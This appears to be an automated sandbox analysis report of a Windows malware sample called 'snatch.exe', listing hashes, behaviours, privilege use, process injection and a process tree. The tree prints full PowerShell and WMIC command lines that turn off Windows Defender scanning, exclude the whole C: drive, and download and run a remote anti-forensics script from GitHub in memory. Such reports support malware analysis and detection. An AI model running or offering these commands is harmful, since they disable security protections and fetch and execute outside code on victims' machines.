Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 16-10-2024 11:59

Behavioral task: behavioral1
Sample: 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
Resource: win7-20240708-en

General
Target: 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
Size: 50.9MB
MD5: 5bfa176d4d484262d8762d97bcd2b784
SHA1: 7f09db1fa2d3f0d4f73621516eabd95f9175de96
SHA256: 54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6
SHA512: 93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675
SSDEEP: 1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Malware Config
Extracted
https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1
Signatures

Blocklisted process makes network request 2 IoCs
Processes: powershell.exe
flow  pid   process
7     2804  powershell.exe
8     2804  powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes: powershell.exe, powershell.exe
pid   process
2412  powershell.exe
2804  powershell.exe
2804  powershell.exe

Executes dropped EXE 1 IoCs
Processes: install.exe
pid   process
2776  install.exe

Loads dropped DLL 2 IoCs
Processes: MsiExec.exe
pid  process
688  MsiExec.exe
688  MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: msiexec.exe, msiexec.exe
description              ioc     process
File opened (read-only)  \??\G:  msiexec.exe
File opened (read-only)  \??\H:  msiexec.exe
File opened (read-only)  \??\X:  msiexec.exe
File opened (read-only)  \??\A:  msiexec.exe
File opened (read-only)  \??\B:  msiexec.exe
File opened (read-only)  \??\Y:  msiexec.exe
File opened (read-only)  \??\O:  msiexec.exe
File opened (read-only)  \??\V:  msiexec.exe
File opened (read-only)  \??\M:  msiexec.exe
File opened (read-only)  \??\O:  msiexec.exe
File opened (read-only)  \??\P:  msiexec.exe
File opened (read-only)  \??\Q:  msiexec.exe
File opened (read-only)  \??\G:  msiexec.exe
File opened (read-only)  \??\J:  msiexec.exe
File opened (read-only)  \??\Z:  msiexec.exe
File opened (read-only)  \??\R:  msiexec.exe
File opened (read-only)  \??\T:  msiexec.exe
File opened (read-only)  \??\V:  msiexec.exe
File opened (read-only)  \??\H:  msiexec.exe
File opened (read-only)  \??\W:  msiexec.exe
File opened (read-only)  \??\A:  msiexec.exe
File opened (read-only)  \??\K:  msiexec.exe
File opened (read-only)  \??\K:  msiexec.exe
File opened (read-only)  \??\S:  msiexec.exe
File opened (read-only)  \??\U:  msiexec.exe
File opened (read-only)  \??\Z:  msiexec.exe
File opened (read-only)  \??\N:  msiexec.exe
File opened (read-only)  \??\P:  msiexec.exe
File opened (read-only)  \??\I:  msiexec.exe
File opened (read-only)  \??\J:  msiexec.exe
File opened (read-only)  \??\L:  msiexec.exe
File opened (read-only)  \??\W:  msiexec.exe
File opened (read-only)  \??\Y:  msiexec.exe
File opened (read-only)  \??\Q:  msiexec.exe
File opened (read-only)  \??\B:  msiexec.exe
File opened (read-only)  \??\E:  msiexec.exe
File opened (read-only)  \??\L:  msiexec.exe
File opened (read-only)  \??\M:  msiexec.exe
File opened (read-only)  \??\S:  msiexec.exe
File opened (read-only)  \??\U:  msiexec.exe
File opened (read-only)  \??\N:  msiexec.exe
File opened (read-only)  \??\E:  msiexec.exe
File opened (read-only)  \??\I:  msiexec.exe
File opened (read-only)  \??\R:  msiexec.exe
File opened (read-only)  \??\T:  msiexec.exe
File opened (read-only)  \??\X:  msiexec.exe

Processes:
resource                                                                    yara_rule
behavioral1/memory/2972-5-0x0000000000DF0000-0x0000000004568000-memory.dmp   upx
behavioral1/memory/2972-36-0x0000000000DF0000-0x0000000004568000-memory.dmp  upx
behavioral1/memory/2972-38-0x0000000000DF0000-0x0000000004568000-memory.dmp  upx

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: install.exe, msiexec.exe, MsiExec.exe
description  ioc                                                           process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  install.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MsiExec.exe

Processes: 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
description       ioc  process
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes: install.exe
pid   process
2776  install.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe
pid   process
2412  powershell.exe
2720  powershell.exe
2804  powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: msiexec.exe
pid   process
2612  msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, powershell.exe, WMIC.exe, powershell.exe, msiexec.exe, msiexec.exe
description                            pid   process
Token: SeDebugPrivilege                2412  powershell.exe
Token: SeDebugPrivilege                2720  powershell.exe
Token: SeIncreaseQuotaPrivilege        2740  WMIC.exe
Token: SeSecurityPrivilege             2740  WMIC.exe
Token: SeTakeOwnershipPrivilege        2740  WMIC.exe
Token: SeLoadDriverPrivilege           2740  WMIC.exe
Token: SeSystemProfilePrivilege        2740  WMIC.exe
Token: SeSystemtimePrivilege           2740  WMIC.exe
Token: SeProfSingleProcessPrivilege    2740  WMIC.exe
Token: SeIncBasePriorityPrivilege      2740  WMIC.exe
Token: SeCreatePagefilePrivilege       2740  WMIC.exe
Token: SeBackupPrivilege               2740  WMIC.exe
Token: SeRestorePrivilege              2740  WMIC.exe
Token: SeShutdownPrivilege             2740  WMIC.exe
Token: SeDebugPrivilege                2740  WMIC.exe
Token: SeSystemEnvironmentPrivilege    2740  WMIC.exe
Token: SeRemoteShutdownPrivilege       2740  WMIC.exe
Token: SeUndockPrivilege               2740  WMIC.exe
Token: SeManageVolumePrivilege         2740  WMIC.exe
Token: 33                              2740  WMIC.exe
Token: 34                              2740  WMIC.exe
Token: 35                              2740  WMIC.exe
Token: SeDebugPrivilege                2804  powershell.exe
Token: SeShutdownPrivilege             2612  msiexec.exe
Token: SeIncreaseQuotaPrivilege        2612  msiexec.exe
Token: SeRestorePrivilege              2684  msiexec.exe
Token: SeTakeOwnershipPrivilege        2684  msiexec.exe
Token: SeSecurityPrivilege             2684  msiexec.exe
Token: SeCreateTokenPrivilege          2612  msiexec.exe
Token: SeAssignPrimaryTokenPrivilege   2612  msiexec.exe
Token: SeLockMemoryPrivilege           2612  msiexec.exe
Token: SeIncreaseQuotaPrivilege        2612  msiexec.exe
Token: SeMachineAccountPrivilege       2612  msiexec.exe
Token: SeTcbPrivilege                  2612  msiexec.exe
Token: SeSecurityPrivilege             2612  msiexec.exe
Token: SeTakeOwnershipPrivilege        2612  msiexec.exe
Token: SeLoadDriverPrivilege           2612  msiexec.exe
Token: SeSystemProfilePrivilege        2612  msiexec.exe
Token: SeSystemtimePrivilege           2612  msiexec.exe
Token: SeProfSingleProcessPrivilege    2612  msiexec.exe
Token: SeIncBasePriorityPrivilege      2612  msiexec.exe
Token: SeCreatePagefilePrivilege       2612  msiexec.exe
Token: SeCreatePermanentPrivilege      2612  msiexec.exe
Token: SeBackupPrivilege               2612  msiexec.exe
Token: SeRestorePrivilege              2612  msiexec.exe
Token: SeShutdownPrivilege             2612  msiexec.exe
Token: SeDebugPrivilege                2612  msiexec.exe
Token: SeAuditPrivilege                2612  msiexec.exe
Token: SeSystemEnvironmentPrivilege    2612  msiexec.exe
Token: SeChangeNotifyPrivilege         2612  msiexec.exe
Token: SeRemoteShutdownPrivilege       2612  msiexec.exe
Token: SeUndockPrivilege               2612  msiexec.exe
Token: SeSyncAgentPrivilege            2612  msiexec.exe
Token: SeEnableDelegationPrivilege     2612  msiexec.exe
Token: SeManageVolumePrivilege         2612  msiexec.exe
Token: SeImpersonatePrivilege          2612  msiexec.exe
Token: SeCreateGlobalPrivilege         2612  msiexec.exe
Token: SeCreateTokenPrivilege          2612  msiexec.exe
Token: SeAssignPrimaryTokenPrivilege   2612  msiexec.exe
Token: SeLockMemoryPrivilege           2612  msiexec.exe
Token: SeIncreaseQuotaPrivilege        2612  msiexec.exe
Token: SeMachineAccountPrivilege       2612  msiexec.exe
Token: SeTcbPrivilege                  2612  msiexec.exe
Token: SeSecurityPrivilege             2612  msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs
Processes: msiexec.exe
pid   process
2612  msiexec.exe

Suspicious use of WriteProcessMemory 36 IoCs
Processes: 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe, powershell.exe, cmd.exe, install.exe, msiexec.exe
description                       pid   process                                                 target process
PID 2972 wrote to memory of 2412  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  powershell.exe
PID 2972 wrote to memory of 2412  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  powershell.exe
PID 2972 wrote to memory of 2412  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  powershell.exe
PID 2972 wrote to memory of 2720  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  powershell.exe
PID 2972 wrote to memory of 2720  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  powershell.exe
PID 2972 wrote to memory of 2720  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  powershell.exe
PID 2412 wrote to memory of 2740  2412  powershell.exe                                          WMIC.exe
PID 2412 wrote to memory of 2740  2412  powershell.exe                                          WMIC.exe
PID 2412 wrote to memory of 2740  2412  powershell.exe                                          WMIC.exe
PID 2412 wrote to memory of 2804  2412  powershell.exe                                          powershell.exe
PID 2412 wrote to memory of 2804  2412  powershell.exe                                          powershell.exe
PID 2412 wrote to memory of 2804  2412  powershell.exe                                          powershell.exe
PID 2972 wrote to memory of 2748  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  cmd.exe
PID 2972 wrote to memory of 2748  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  cmd.exe
PID 2972 wrote to memory of 2748  2972  2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe  cmd.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2748 wrote to memory of 2776  2748  cmd.exe                                                 install.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2776 wrote to memory of 2612  2776  install.exe                                             msiexec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe
PID 2684 wrote to memory of 688   2684  msiexec.exe                                             MsiExec.exe

Processes
PID 2972: C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory

  PID 2412: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    PID 2740: C:\Windows\System32\Wbem\WMIC.exe
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
      - Suspicious use of AdjustPrivilegeToken

    PID 2804: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  PID 2720: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  PID 2748: C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c install.exe
    - Suspicious use of WriteProcessMemory

    PID 2776: C:\Users\Admin\AppData\Local\Temp\install.exe
      Command line: install.exe
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory

      PID 2612: C:\Windows\SysWOW64\msiexec.exe
        Command line: msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp
        - Enumerates connected drives
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow

PID 2684: C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  PID 688: C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 71A874F1A3A05924F5C0B10E1827D917 C
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery

Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB